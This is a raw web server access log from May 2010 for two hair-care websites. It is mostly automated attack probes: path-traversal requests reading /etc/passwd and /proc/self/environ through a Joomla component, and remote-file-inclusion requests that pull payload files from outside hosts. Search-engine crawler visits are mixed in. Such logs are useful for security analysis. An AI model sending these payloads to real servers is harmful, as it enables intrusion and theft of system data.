216.227.218.240 - - [17/May/2010:05:36:17 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:05:37:00 -0700] "GET /logs/access.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:05:37:00 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1" "www.freehairsecrets.com"
216.227.218.240 - - [17/May/2010:05:37:00 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:37:27 -0700] "GET /logs/access.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:37:27 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:37:27 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:37:38 -0700] "GET /logs/access.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:37:38 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
216.227.221.228 - - [17/May/2010:05:37:38 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:38:36 -0700] "GET /logs/access.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:38:36 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:38:37 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:38:47 -0700] "GET /logs/access.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:38:47 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:38:47 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:39:41 -0700] "GET /logs/access.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:39:41 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:39:41 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:39:51 -0700] "GET /logs/access.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1) Gecko/" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:39:51 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.0; nl; rv:1.8.0.9) Geck" "www.freehairsecrets.com"
79.174.72.86 - - [17/May/2010:05:39:51 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.0.8) Geck" "www.freehairsecrets.com"
74.124.219.45 - - [17/May/2010:06:25:37 -0700] "GET /skin/zero_vote/error.php?dir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:06:26:17 -0700] "GET /skin/zero_vote/error.php?dir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:06:26:38 -0700] "GET /skin/zero_vote/error.php?dir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:06:26:42 -0700] "GET /skin/zero_vote/error.php?dir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
208.80.193.42 - - [17/May/2010:06:30:52 -0700] "GET / HTTP/1.0" 200 910 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; SIMBAR Enabled; SIMBAR={B5447483-B166-4c34-B355-80D068D48374}; FunWebProducts; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.growlonghairfast.com"
67.195.112.151 - - [17/May/2010:06:31:46 -0700] "GET /tmp/mailError.log HTTP/1.0" 200 62167 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:06:32:59 -0700] "GET /logs/access_100315.log//skin/zero_vote/error.php?dir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:06:32:59 -0700] "GET /skin/zero_vote/error.php?dir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:06:32:59 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.apatar.com/modules/readme.txt?? HTTP/1.0" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.195.112.151 - - [17/May/2010:06:33:16 -0700] "GET /logs/access_091102.log HTTP/1.0" 200 696678 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:06:35:55 -0700] "GET /logs/access_100315.log//skin/zero_vote/error.php?dir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:06:35:55 -0700] "GET /skin/zero_vote/error.php?dir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
74.124.219.45 - - [17/May/2010:06:35:55 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.195.114.238 - - [17/May/2010:06:36:42 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
67.195.114.238 - - [17/May/2010:06:36:42 -0700] "GET /?M=A HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
77.88.25.28 - - [17/May/2010:06:48:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13649 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
121.190.102.21 - - [17/May/2010:06:48:12 -0700] "GET /logs/access.log%20%20////appserv/main.php?appserv_root=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [17/May/2010:06:48:12 -0700] "GET /logs////appserv/main.php?appserv_root=http://dive2world.com/newdive/1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [17/May/2010:06:48:12 -0700] "GET ///appserv/main.php?appserv_root=http://dive2world.com/newdive/1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
121.190.102.21 - - [17/May/2010:06:53:11 -0700] "GET /www.eaerconditionat.ro/cauta.php?q=http://dive2world.com/newdive/1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:06:53:11 -0700] "GET /logs/www.eaerconditionat.ro/cauta.php?q=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:06:53:11 -0700] "GET /logs/access_100315.log%20%20/www.eaerconditionat.ro/cauta.php?q=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.249.68.39 - - [17/May/2010:07:01:48 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
84.40.30.37 - - [17/May/2010:07:03:31 -0700] "GET /logs//include/lib.inc.php?site_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [17/May/2010:07:03:31 -0700] "GET /include/lib.inc.php?site_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [17/May/2010:07:03:31 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [17/May/2010:07:03:38 -0700] "GET /logs//include/lib.inc.php?site_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [17/May/2010:07:03:38 -0700] "GET /include/lib.inc.php?site_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
84.40.30.37 - - [17/May/2010:07:03:40 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
67.195.112.151 - - [17/May/2010:07:09:25 -0700] "GET /?M=D HTTP/1.0" 200 910 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
64.34.162.143 - - [17/May/2010:07:11:20 -0700] "GET /skin/zero_vote/setup.php?dir=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.143 - - [17/May/2010:07:11:30 -0700] "GET /logs//skin/zero_vote/setup.php?dir=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.34.162.143 - - [17/May/2010:07:11:30 -0700] "GET /logs/access.log%20%20//skin/zero_vote/setup.php?dir=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
65.18.200.12 - - [17/May/2010:07:30:00 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.65" "growlonghairfast.com"
204.236.253.88 - - [17/May/2010:07:30:02 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
204.236.253.88 - - [17/May/2010:07:30:04 -0700] "GET /freehairsecretsphp/viewtopic.php?p=2070 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
64.34.162.143 - - [17/May/2010:07:30:09 -0700] "GET /logs/access.log//skin/zero_vote/setup.php?dir=http://smash3.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
65.18.200.12 - - [17/May/2010:07:33:09 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.65" "www.freehairsecrets.com"
65.18.200.12 - - [17/May/2010:07:37:18 -0700] "GET /logs/access.log//?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "www.freehairsecrets.com"
65.18.200.12 - - [17/May/2010:07:37:18 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.65" "www.freehairsecrets.com"
65.18.200.12 - - [17/May/2010:07:37:19 -0700] "GET /logs//?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5376 "-" "libwww-perl/5.65" "www.freehairsecrets.com"
65.18.200.12 - - [17/May/2010:07:38:37 -0700] "GET /logs/access_100412.log//?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
65.18.200.12 - - [17/May/2010:07:38:38 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.65" "growlonghairfast.com"
65.18.200.12 - - [17/May/2010:07:38:38 -0700] "GET /logs//?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5376 "-" "libwww-perl/5.65" "growlonghairfast.com"
184.73.79.65 - - [17/May/2010:07:50:27 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "www.freehairsecrets.com"
184.73.79.65 - - [17/May/2010:07:50:27 -0700] "GET / HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "www.freehairsecrets.com"
184.73.79.65 - - [17/May/2010:07:50:55 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "www.freehairsecrets.com"
184.73.79.65 - - [17/May/2010:07:50:55 -0700] "GET /logs/ HTTP/1.1" 200 5371 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "www.freehairsecrets.com"
184.73.79.65 - - [17/May/2010:07:51:06 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "www.freehairsecrets.com"
184.73.79.65 - - [17/May/2010:07:51:07 -0700] "GET /?S=A HTTP/1.1" 200 926 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "www.freehairsecrets.com"
98.204.171.3 - - [17/May/2010:08:02:23 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.65" "growlonghairfast.com"
98.204.171.3 - - [17/May/2010:08:13:37 -0700] "GET /logs/access_100412.log//?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
98.204.171.3 - - [17/May/2010:08:13:38 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.65" "growlonghairfast.com"
98.204.171.3 - - [17/May/2010:08:13:38 -0700] "GET /logs//?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5376 "-" "libwww-perl/5.65" "growlonghairfast.com"
89.248.172.14 - - [17/May/2010:08:19:53 -0700] "GET /freehairsecretsphp/index.php%20(200%20ok)%20ACCEPTED HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "growlonghairfast.com"
67.195.111.220 - - [17/May/2010:08:29:50 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.111.220 - - [17/May/2010:08:29:51 -0700] "GET /logs/access_091026.log HTTP/1.0" 200 562644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
184.73.16.1 - - [17/May/2010:08:35:39 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
184.73.16.1 - - [17/May/2010:08:35:41 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14990 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
75.125.250.26 - - [17/May/2010:08:45:14 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:08:45:42 -0700] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:08:45:43 -0700] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [17/May/2010:08:45:43 -0700] "GET /logs/access_100125.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.250.26 - - [17/May/2010:08:48:42 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
91.201.66.55 - - [17/May/2010:08:51:42 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://freehairsecrets.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "freehairsecrets.com"
91.201.66.55 - - [17/May/2010:08:51:42 -0700] "GET / HTTP/1.0" 200 910 "http://freehairsecrets.com/" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)" "freehairsecrets.com"
78.138.88.246 - - [17/May/2010:08:51:50 -0700] "GET /logs/access_100125.log/components/com_virtuemart/index.php?mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.246 - - [17/May/2010:08:51:50 -0700] "GET /components/com_virtuemart/index.php?mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
78.138.88.246 - - [17/May/2010:08:51:50 -0700] "GET /logs/components/com_virtuemart/index.php?mosConfig.absolute.path=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.250.26 - - [17/May/2010:08:55:09 -0700] "GET /logs/access_100412.log/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
75.125.250.26 - - [17/May/2010:08:55:09 -0700] "GET /*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
75.125.250.26 - - [17/May/2010:08:55:09 -0700] "GET /logs/*.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.232.85.247 - - [17/May/2010:08:55:26 -0700] "GET /bbs/include/write.php?dir=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [17/May/2010:08:55:26 -0700] "GET /logs//bbs/include/write.php?dir=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.232.85.247 - - [17/May/2010:08:55:27 -0700] "GET /logs/access_100405.log//bbs/include/write.php?dir=http://liceum3.ru/help/sh/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.125.250.26 - - [17/May/2010:08:56:36 -0700] "GET /logs/access_100412.log//?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
75.125.250.26 - - [17/May/2010:08:56:36 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.805" "growlonghairfast.com"
75.125.250.26 - - [17/May/2010:08:56:37 -0700] "GET /logs//?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5376 "-" "libwww-perl/5.805" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:08:57:00 -0700] "GET /logs/access_100329.log%20%20//apa_phpinclude.inc.php?apa_module_basedir=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:08:57:00 -0700] "GET /apa_phpinclude.inc.php?apa_module_basedir=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:08:57:00 -0700] "GET /logs//apa_phpinclude.inc.php?apa_module_basedir=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [17/May/2010:08:57:03 -0700] "GET /logs/access_100208.log HTTP/1.1" 200 0 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
124.0.74.195 - - [17/May/2010:08:57:05 -0700] "GET /logs/access_100405.log%20%20//apa_phpinclude.inc.php?apa_module_basedir=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
124.0.74.195 - - [17/May/2010:08:57:08 -0700] "GET /apa_phpinclude.inc.php?apa_module_basedir=http://liceum3.ru/help/sh/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
